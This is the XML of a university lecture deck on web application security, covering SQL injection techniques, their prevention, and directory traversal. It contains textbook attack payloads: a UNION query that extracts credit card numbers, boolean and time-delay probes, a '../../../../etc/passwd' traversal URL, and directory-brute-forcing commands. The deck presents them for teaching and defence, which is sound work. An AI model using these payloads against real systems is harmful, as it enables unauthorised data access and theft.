          <ac:chgData name="Hudan Studiawan" userId="b59d24ee-dde4-4e13-810a-57bc721b8039" providerId="ADAL" clId="{04B23392-4C56-EE4D-A772-E9632D5F2194}" dt="2023-09-13T10:07:40.830" v="49" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3992169633" sldId="391"/>
            <ac:spMk id="2" creationId="{549B3EB8-158D-43FA-4162-40442F8D5F8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9/13/23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546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9/13/23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87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9/13/23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42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9/13/23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9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9/13/23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0874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9/13/23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2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9/13/23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93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9/13/23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7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9/13/23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0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9/13/23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9/13/23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18255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9/13/23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16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file:///C:\Program%20Files\Inknoe%20ClassPoint\Images\word_count_without%20result_default.p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GB"/>
              <a:t>Cyber Drill – Web Application Security</a:t>
            </a:r>
            <a:endParaRPr err="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;53;p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solidFill>
            <a:srgbClr val="D8D8D8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indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID"/>
              <a:t>Baskoro Adi Pratomo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="id-ID"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1600" err="1"/>
              <a:t>Informatics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" sz="1600"/>
              <a:t> Department</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1600"/>
              <a:t>Institut Teknologi Sepuluh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID" sz="1600" err="1"/>
              <a:t>Nopember</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1600"/>
              <a:t>Surabaya, Indonesia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1600"/>
              <a:t>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85BA-4AC4-4502-BD62-CB2C7DE7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Blind SQL Injection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CAFFB-9B71-433D-945E-06B2C5BBE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 type of SQL Injection attack that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>asks the database true or false questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> and determines the answer based on the applications response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Union Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Boolean Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Time Delay Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Error-based Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Out of Band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>Explotation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedure Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Woman covering eyes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0320F132-F577-4B69-9F74-351E596D0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019" y="0"/>
            <a:ext cx="2601581" cy="173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4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85BA-4AC4-4502-BD62-CB2C7DE7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Blind SQL Injection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CAFFB-9B71-433D-945E-06B2C5BBE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 type of SQL Injection attack that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>asks the database true or false questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> and determines the answer based on the applications response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Union Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Boolean Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Time Delay Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Error-based Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Out of Band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>Explotation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedure Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Woman covering eyes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0320F132-F577-4B69-9F74-351E596D0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019" y="0"/>
            <a:ext cx="2601581" cy="173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6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84C8-555A-4D0E-9B34-A4357AE91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Union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CAF6C-BDB9-4F35-8BD5-F39B0BFE4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Example query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SELECT Name, Phone, Address FROM Users WHERE Id=$id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Set $id to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1 UNION ALL SELECT creditCardNumber,1,1 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>CreditCardTable</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ALL keyword is used to override DISTINCT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>The number of columns in both parts of the query has to be the same</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16116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79728-A71A-4D2B-BD0C-36B62A4AC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Boolean Exploitation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28D11-0DBE-4692-97AB-5AE8D400F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Example query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SELECT field1, field2, field3 FROM Users WHERE Id='$Id’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Set $id to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1' AND '1' = ‘2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Or,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99754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AF633-27AC-469D-A13B-5FEB9769B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Time-based SQL Injection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F220-B9EE-4C68-B5DB-B6949B14B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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>query:</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SELECT * FROM products WHERE id_product=$id_product</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> $id_product </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--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05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7AE83-E281-4BCD-B49E-F47379F4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do we identify SQL Injection vulnerabilities?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69E9F-3D93-4EB1-ABAC-48187279A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Look for editable parameters/cookies/HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Try various techniques we discussed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Or, just use a tool like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>SQLMap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59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D2FB48D-4A69-4810-BAB0-AADEB37A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>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Prevention </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>(1)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AB5E7BF-7483-427D-8A99-4F4F1346B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d-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Escap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> User Supplied Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="id-ID">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prepared Statements</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="id-ID">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="id-ID">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr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76037B6B-0FC0-43DC-8B2B-01548574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339" y="2039463"/>
            <a:ext cx="5902712" cy="881379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Gambar 5" descr="Sebuah gambar berisi teks&#10;&#10;Deskripsi dibuat secara otomatis">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03420B8C-12D8-4AE9-A6F1-1117B9D14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35" y="3429000"/>
            <a:ext cx="5977053" cy="2301079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Gambar 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8EEEBC7-29C0-4B4E-8F2F-F7E5ADFB1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335" y="5731056"/>
            <a:ext cx="8318809" cy="101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62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AE5F3D0-BC90-4F8C-AE23-7C6CF5C7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>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t> (2)</a:t>
            </a:r>
            <a:endParaRPr lang="id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FD06DAF-BDB2-42AC-933C-50C424004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+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Stored Procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ensure the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user has the minimum required privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Use a w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nput </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="id-ID">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>alidation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="id-ID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4111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AA79-8E25-42F8-9F32-06FD49FB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Directory Traversal Vulnerabilities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A4A8F-11BD-42E1-A668-D372EF606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Vulnerabilities that allow attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1"/>
              <a:t>gain unauthorized access to files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> within an application or files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1"/>
              <a:t>normally not accessible through a web interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, such as those outside the application’s web root directory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0C704E-C00F-4379-AFE4-C0CC57D0E3D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2552699" y="4285738"/>
            <a:ext cx="3181350" cy="2376563"/>
            <a:chOff x="3438524" y="4481437"/>
            <a:chExt cx="3181350" cy="2376563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4" descr="3D stairs design">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D62F5DF-8AD7-434B-AD4B-99DF2B31F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438524" y="4481437"/>
              <a:ext cx="3181350" cy="237656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92C638-CCDC-4913-8A8C-380368E914A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4305300" y="4746550"/>
              <a:ext cx="865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passwd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70D456-F821-4C73-8567-5E29EE876D1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4543425" y="5058915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etc/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03EAE8-CBA5-415E-8B5B-D91A2381D2EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4815791" y="5366692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../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200568-E427-4B8E-A4B9-BC61AB37CD9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5353049" y="5931010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../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EFEFBB-38A4-4AF8-965B-2F4D2E494977}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5088157" y="5664972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../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70649C-3276-4A97-AE67-6B5CBA9A400C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4968191" y="5519092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../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9372EA-9B3D-4AE3-B003-9B8465F62C05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5762254" y="6185098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../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1725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D67AF-81C0-2770-702E-FC5F4544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Directory Traversal Vulnerabilities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0908-39F7-7E68-C091-F93690CFD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Successful exploitation can grant the attacker access to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>application source code, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>configuration files, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>critical system files, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>other sensitive data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In some situations, it may also be used to write to or manipulate files, leading to further attack vectors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673966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E487-3C26-469C-A204-A1D4A720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B31D2-DFDA-4365-A07C-A243CA42B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All materials in this presentations should be used ethically and for evaluating our applications only.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Please Meow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{679260EF-27DA-429A-A7E3-501E1060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248602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10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021E-C16A-7E07-7284-C5619B7E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8AFE4-4BB4-A6E4-239F-1FB10D411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Web applications often require accessing files or resources from the server's file system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For example, a web application might fetch and display user avatars from a specific directory. If the application does not validate or sanitize user input properly, an attacker can exploit this to request files outside the intended directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The most common payloads used in a directory traversal attack utilize the ../ sequence, which in many file systems represents the parent directory.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630408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6141B-968E-41A1-A99C-C237E367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A86AE-8B24-4A07-BF65-8182A702B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Suppose we have this PHP and HTML script for changing the background colour of our website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392D3-3C8B-4DBD-B05E-2AF1DFBC2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89"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307819" y="3057585"/>
            <a:ext cx="4114286" cy="248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97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B4FE6-D833-0B11-ADA3-12D909149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Tools: directory listing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51103-1E60-D132-AEF3-0D3ACDDBC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dirbuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alamat: 127.0.0.1:42001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wordlist: 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dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/wordlists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go faster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http:// 127.0.0.1:42001/ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>common.txt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067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21F5-2E41-F4AF-76AD-B0B70FB26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5000C-6CF8-78A1-3E55-6C4F3B909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example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>profile.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Here, the application would fetch the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profile.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file from a predefined directory, say /var/www/images/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>However, if the application does not sanitize the file parameter correctly, an attacker could use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>view?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>=../../../../etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en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54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8C338-30A9-4E01-AC16-8A5B4D9E1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Identifying Directory Traversal Vulnerabilities?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10179-F735-43A5-8ABB-CD556D11A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Locate parameters that we can manipulate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attempt to use them to load arbitrary files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
